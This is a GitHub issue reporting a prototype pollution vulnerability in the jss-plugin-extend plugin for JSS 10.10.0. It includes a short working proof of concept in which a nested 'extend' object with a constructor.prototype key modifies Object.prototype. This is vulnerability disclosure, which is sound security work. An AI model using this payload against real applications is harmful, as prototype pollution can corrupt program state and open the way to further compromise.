Skip to content

Prototype Pollution in the plugin jss-plugin-extend #1673

Open
Open
Prototype Pollution in the plugin jss-plugin-extend#1673
@cstimkong

Description

@cstimkong
cstimkong
opened on May 28, 2026

Expected behavior:
The prototype object Object.prototype should not be modified.

Describe the bug:
There is a prototype pollution vulnerability in the plugin jss-plugin-extend

Reproduction:

Using the following exploit:

var jss = require('jss');
var extend = require('jss-plugin-extend');

var s = jss.create()
  .use(extend.default())
  .createStyleSheet(
  {extend: {extend: {constructor: {prototype: {polluted: 'yes'}}}}}
  );
console.log(Object.prototype.polluted === 'yes')

Versions (please complete the following information):

  • jss: 10.10.0 (newest)
  • OS [Linux, macOS, Windows]:

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions